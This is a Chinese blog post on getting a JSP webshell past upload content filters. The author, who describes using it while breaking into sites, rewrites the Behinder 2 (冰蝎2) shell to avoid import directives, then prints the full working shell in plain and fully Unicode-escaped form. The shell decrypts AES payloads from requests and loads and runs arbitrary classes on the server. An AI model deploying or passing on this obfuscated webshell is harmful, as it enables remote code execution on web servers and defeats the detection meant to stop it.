文件上传bypass jsp内容检测的一些方法

　　bx2=冰蝎2

　　前段时间渗透遇到了个检测jsp内容的，然后发现全unicode编码就可以绕过，但是对bx2马进行全编码他出现了一些错误，我尝试简单改了下，日站还是bx2操作舒服点

　　检测内容的话，这样直接拦截

　　开始本地测试:　　

测试的时候发现tomcat容器下:

测试的时候发现tomcat容器下:
<%内容全编码%> 自动解析可以正常执行
<%!内容全编码%>自动解析可以正常执行
<%=内容全编码%>自动解析可以正常执行
<%@ page import=""%> 当我对这个内容全编码的时候不支持解析，直接报错

演示一个:<% out.print(123);%>和<% uncicode编码%>结果都是一样

对bx2 马的改造:

已知bx2马里面最上面这段代码:

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>

即使我们unciode编码也是不行的，那么需要把导入包改成直接引用:

写个小demo吧,就拿bx2里面的一部分来说:

如果你要调用UUID.randomUUID,一定要导入java.util包。

那么我们应该改成直接引用:

如果我们改成这样

就少掉了导入的那一部分，在开发中如果自动import导入，会更方便开发。

这样写的话我们就完全不需要<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>

那么改动完的代码如下:

<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+java.util.UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(2,new javax.crypto.spec.SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

那么我们之前实验知道<%!内容%>和<%内容%>，对内unicode编码都是可以被解析的

那么现在我们改动下:

<%!\u0063\u006c\u0061\u0073\u0073\u0020\u0055\u0020\u0065\u0078\u0074\u0065\u006e\u0064\u0073\u0020\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u007b\u0055\u0028\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u0020\u0063\u0029\u007b\u0073\u0075\u0070\u0065\u0072\u0028\u0063\u0029\u003b\u007d\u0070\u0075\u0062\u006c\u0069\u0063\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0067\u0028\u0062\u0079\u0074\u0065\u0020\u005b\u005d\u0062\u0029\u007b\u0072\u0065\u0074\u0075\u0072\u006e\u0020\u0073\u0075\u0070\u0065\u0072\u002e\u0064\u0065\u0066\u0069\u006e\u0065\u0043\u006c\u0061\u0073\u0073\u0028\u0062\u002c\u0030\u002c\u0062\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u003b\u007d\u007d%><%\u0069\u0066\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0070\u0061\u0073\u0073\u0022\u0029\u0021\u003d\u006e\u0075\u006c\u006c\u0029\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u006b\u003d\u0028\u0022\u0022\u002b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0055\u0055\u0049\u0044\u002e\u0072\u0061\u006e\u0064\u006f\u006d\u0055\u0055\u0049\u0044\u0028\u0029\u0029\u002e\u0072\u0065\u0070\u006c\u0061\u0063\u0065\u0028\u0022\u002d\u0022\u002c\u0022\u0022\u0029\u002e\u0073\u0075\u0062\u0073\u0074\u0072\u0069\u006e\u0067\u0028\u0031\u0036\u0029\u003b\u0073\u0065\u0073\u0073\u0069\u006f\u006e\u002e\u0070\u0075\u0074\u0056\u0061\u006c\u0075\u0065\u0028\u0022\u0075\u0022\u002c\u006b\u0029\u003b\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u0028\u006b\u0029\u003b\u0072\u0065\u0074\u0075\u0072\u006e\u003b\u007d\u006a\u0061\u0076\u0061\u0078\u002e\u0063\u0072\u0079\u0070\u0074\u006f\u002e\u0043\u0069\u0070\u0068\u0065\u0072\u0020\u0063\u003d\u006a\u0061\u0076\u0061\u0078\u002e\u0063\u0072\u0079\u0070\u0074\u006f\u002e\u0043\u0069\u0070\u0068\u0065\u0072\u002e\u0067\u0065\u0074\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0022\u0041\u0045\u0053\u0022\u0029\u003b\u0063\u002e\u0069\u006e\u0069\u0074\u0028\u0032\u002c\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u0078\u002e\u0063\u0072\u0079\u0070\u0074\u006f\u002e\u0073\u0070\u0065\u0063\u002e\u0053\u0065\u0063\u0072\u0065\u0074\u004b\u0065\u0079\u0053\u0070\u0065\u0063\u0028\u0028\u0073\u0065\u0073\u0073\u0069\u006f\u006e\u002e\u0067\u0065\u0074\u0056\u0061\u006c\u0075\u0065\u0028\u0022\u0075\u0022\u0029\u002b\u0022\u0022\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0029\u002c\u0022\u0041\u0045\u0053\u0022\u0029\u0029\u003b\u006e\u0065\u0077\u0020\u0055\u0028\u0074\u0068\u0069\u0073\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u004c\u006f\u0061\u0064\u0065\u0072\u0028\u0029\u0029\u002e\u0067\u0028\u0063\u002e\u0064\u006f\u0046\u0069\u006e\u0061\u006c\u0028\u006e\u0065\u0077\u0020\u0073\u0075\u006e\u002e\u006d\u0069\u0073\u0063\u002e\u0042\u0041\u0053\u0045\u0036\u0034\u0044\u0065\u0063\u006f\u0064\u0065\u0072\u0028\u0029\u002e\u0064\u0065\u0063\u006f\u0064\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0028\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0052\u0065\u0061\u0064\u0065\u0072\u0028\u0029\u002e\u0072\u0065\u0061\u0064\u004c\u0069\u006e\u0065\u0028\u0029\u0029\u0029\u0029\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u002e\u0065\u0071\u0075\u0061\u006c\u0073\u0028\u0070\u0061\u0067\u0065\u0043\u006f\u006e\u0074\u0065\u0078\u0074\u0029\u003b%>

我们再次连接:

没有异常问题，可连接。

posted @ 2020-11-12 13:44 飘渺红尘✨ 阅读(819) 评论(1) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

飘渺红尘

永远年轻永远热泪盈眶,永远在路上星光不问赶路人,时光不负有心人

文件上传bypass jsp内容检测的一些方法

公告

飘渺红尘

永远年轻永远热泪盈眶,永远在路上 星光不问赶路人,时光不负有心人

文件上传bypass jsp内容检测的一些方法

公告

永远年轻永远热泪盈眶,永远在路上星光不问赶路人,时光不负有心人